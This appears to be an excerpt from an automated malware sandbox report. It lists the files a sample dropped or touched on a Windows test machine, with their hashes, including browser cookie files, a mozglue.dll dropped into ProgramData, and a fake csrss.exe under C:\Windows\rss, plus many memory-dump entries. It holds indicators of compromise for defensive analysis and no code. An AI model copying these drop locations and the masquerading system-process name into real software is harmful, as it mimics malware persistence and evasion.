SHA512 654b51d896eecea05c20adaa19002d7bbd40b5ed4bb9e299f3043645331ce8820f1bbf0faed9282e516e6cfe6f19a181d45022e74c142aa8e8a74de279dad158

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\86KONSSQ\edgecompatviewlist[1].xml

MD5 d4fc49dc14f63895d997fa4940f24378
SHA1 3efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256 853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512 cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\I5JZ6R18.cookie

MD5 f81622044480afc558aa1992974c7f8c
SHA1 964f5e846d29a3fe20c699fd18a110b6ea6b870d
SHA256 32bc64c1157451197736d4c5add1b03d873cb1a62f63e878669ce5b897d9d7b2
SHA512 7de6442cccbfc8d5c644712e527624e5a1e2431ce53b5d94a3ad418610295cbc09a0b00e7ace433e4776b05ff39b9714f3f2f9bbc4c3177e295fa2248024646f

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\0ZTDTVHO.cookie

MD5 8fc0436d5cda6d3e3d3842b797adf832
SHA1 09a35057fb80377c7508c492479adb846996a90f
SHA256 20f4b47bd40c19352242da56acc6bc78805363a8c9428391b78d2b224ecb5419
SHA512 daf604213a8196e12c63b9fc7177d33b7ee18d1af5448d121d2ce515209bb5bc4dc8f04f7f0e1e39a6e81414ffcc17bdbaa099a78242f415cc40f6a94eb51a80

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\B04NBSHZ.cookie

MD5 00e41192c8ba2db380eb663b4d9216f2
SHA1 5a6265649d0780d1ef6dca9bfb0694fbc881f451
SHA256 8f75f101399ef34f837bdd8c098a07adb340aabe419a710e22d87cc6d1563a1b
SHA512 6271237bdbc3c77fa9a05641fcdf2e83693f6cf3d02b2b3403e48ea9cb9bb2dad52e9560033cf130afe4bd56c0da67f0fa9d7d95be4bd90ea61aef536b2afb7d

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\26P8CEQS\hcaptcha[1].js

MD5 c2a59891981a9fd9c791bbff1344df52
SHA1 1bd69409a50107057b5340656d1ecd6f5726841f
SHA256 6beec8b04234097105f5d7a88af9c27552b27021446c9dbe029d908d1ff8599f
SHA512 f9d556e0f7e95e603881c5196cc2aa736eb24ed62086d09d36a9e1d6b4fec9f4c1dfb125a66bec301f57230a4242108c7c255e6aa3c6f08a3a0d75e0cf288afe

memory/5728-2908-0x0000000000400000-0x000000000046F000-memory.dmp

memory/5728-2918-0x0000000000680000-0x00000000006DA000-memory.dmp

memory/5728-2919-0x0000000073050000-0x000000007373E000-memory.dmp

memory/5728-2921-0x00000000075C0000-0x00000000075D0000-memory.dmp

memory/5728-2938-0x0000000007FB0000-0x0000000008016000-memory.dmp

memory/5728-2954-0x0000000008990000-0x0000000008A06000-memory.dmp

memory/5728-2955-0x0000000008A60000-0x0000000008C22000-memory.dmp

memory/5728-2956-0x0000000008C50000-0x000000000917C000-memory.dmp

memory/5728-2957-0x0000000009290000-0x00000000092AE000-memory.dmp

memory/5728-2963-0x0000000002340000-0x0000000002390000-memory.dmp

memory/5968-2991-0x0000000073050000-0x000000007373E000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\OANWFX4C\favicon[1].ico

MD5 f3418a443e7d841097c714d69ec4bcb8
SHA1 49263695f6b0cdd72f45cf1b775e660fdc36c606
SHA256 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
SHA512 82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

memory/5728-3019-0x0000000073050000-0x000000007373E000-memory.dmp

memory/6808-3067-0x0000000000620000-0x00000000012BC000-memory.dmp

memory/6808-3068-0x0000000073050000-0x000000007373E000-memory.dmp

memory/7060-3072-0x000001C8F26F0000-0x000001C8F27DE000-memory.dmp

memory/7060-3075-0x00007FFDB7610000-0x00007FFDB7FFC000-memory.dmp

memory/7060-3074-0x000001C8F4570000-0x000001C8F4650000-memory.dmp

memory/7060-3076-0x000001C8F46B0000-0x000001C8F46C0000-memory.dmp

memory/7060-3077-0x000001C8F4E60000-0x000001C8F4F40000-memory.dmp

memory/7060-3082-0x000001C8F4F40000-0x000001C8F5008000-memory.dmp

memory/7060-3083-0x000001C8F5110000-0x000001C8F51D8000-memory.dmp

memory/7060-3086-0x000001C8F4650000-0x000001C8F469C000-memory.dmp

memory/6084-3096-0x00000000000C0000-0x00000000002ED000-memory.dmp

memory/6488-3103-0x0000000000400000-0x00000000004AA000-memory.dmp

memory/4708-3101-0x0000000000AF0000-0x0000000000AF1000-memory.dmp

memory/6488-3106-0x00007FFDB7610000-0x00007FFDB7FFC000-memory.dmp

memory/6808-3104-0x0000000073050000-0x000000007373E000-memory.dmp

memory/7060-3105-0x00007FFDB7610000-0x00007FFDB7FFC000-memory.dmp

memory/6488-3108-0x0000019251AD0000-0x0000019251BB4000-memory.dmp

memory/6488-3107-0x0000019251C30000-0x0000019251C40000-memory.dmp

memory/6588-3152-0x0000000000A60000-0x0000000000B60000-memory.dmp

memory/6588-3154-0x00000000008B0000-0x00000000008B9000-memory.dmp

memory/7084-3159-0x0000000000400000-0x0000000000409000-memory.dmp

memory/6940-3176-0x0000000002960000-0x0000000002D5F000-memory.dmp

memory/6940-3182-0x0000000002D60000-0x000000000364B000-memory.dmp

memory/6940-3186-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\~DF5EDDD3D0FDDC664D.TMP

MD5 8ca8e2f4bb7db1fe09c9e747f91aa32e
SHA1 e3d1f08ad7b605cab7009dce9a33f97df3c16e6f
SHA256 7bb4fbaed7d6c90800e72565dd6945b03585b8494936492854a2392ff1d9ebc6
SHA512 1d5e1ce25af612e08fd00c806c3ea5015f51f912b06cd92ee2cc86abdbaf7d6f5aba59d63818c20e9a5955600e0dc7adbbbfe63cd2d286dd617965848ac85a9d

memory/7084-3364-0x0000000000400000-0x0000000000409000-memory.dmp

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/5240-3685-0x00000000064D0000-0x0000000006506000-memory.dmp

memory/5240-3686-0x0000000006610000-0x0000000006620000-memory.dmp

memory/5240-3683-0x0000000073050000-0x000000007373E000-memory.dmp

memory/4708-3688-0x0000000000AF0000-0x0000000000AF1000-memory.dmp

memory/5240-3691-0x0000000006C50000-0x0000000007278000-memory.dmp

memory/5240-3692-0x0000000006610000-0x0000000006620000-memory.dmp

memory/5240-3704-0x0000000006B30000-0x0000000006B52000-memory.dmp

memory/5240-3709-0x0000000007440000-0x00000000074A6000-memory.dmp

memory/5240-3713-0x0000000007520000-0x0000000007870000-memory.dmp

memory/6084-3719-0x00000000000C0000-0x00000000002ED000-memory.dmp

memory/5240-3728-0x0000000007970000-0x000000000798C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ymhdrckv.soj.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/5240-3780-0x0000000008A10000-0x0000000008A4C000-memory.dmp

memory/5240-3897-0x0000000009900000-0x0000000009933000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\S6QQMHFC\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

memory/5240-3900-0x000000006D390000-0x000000006D3DB000-memory.dmp

memory/5240-3908-0x000000006BC70000-0x000000006BFC0000-memory.dmp

memory/5240-3911-0x00000000098E0000-0x00000000098FE000-memory.dmp

C:\Users\Admin\AppData\Roaming\ttdegdw

MD5 6f38e2c344007fa6c5a609f3baa82894
SHA1 9296d861ae076ebddac76b490c2e56fcd0d63c6d
SHA256 fb1b0639a3bdd51f914bf71948d88555e1bbb9de0937f8fa94e7aa38a8d6ab9f
SHA512 5432ab0139ee88a7b509d60ed39d3b69f7c38fe94613b3d72cc4480112d95b2cbf7652438801e7e7956aca73d6ebc870851814bec0082f4d77737a024990e059

C:\Users\Admin\AppData\Local\Temp\tmp949B.tmp

MD5 843933002e97a0ed13a5842ff69162e7
SHA1 78c28c8cf61ad98c9dce2855d27af25c2cb0254c
SHA256 1976c8cf1ab2fd32680f25be2b7b5d7c8ae5780948024cafbbdde28e25cdf31c
SHA512 77c82c3cc8dc7dccb2e59670b35539fda008ed002624125126558116697f07862cdce4489e581b6a2bf5e61bc5f0fd93d8adcd2370556dd053649c4ab2b0ebdb

C:\Users\Admin\AppData\Local\Temp\tmp9487.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmp94D6.tmp

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

C:\Windows\rss\csrss.exe

MD5 a98f00f0876312e7f85646d2e4fe9ded
SHA1 5d6650725d89fea37c88a0e41b2486834a8b7546
SHA256 787892fff0e39d65ccf86bb7f945be728287aaf80064b7acc84b9122e49d54e6
SHA512 f5ca9ec79d5639c06727dd106e494a39f12de150fbfbb0461d5679aed6a137b3781eedf51beaf02b61d183991d8bca4c08a045a83412525d1e28283856fa3802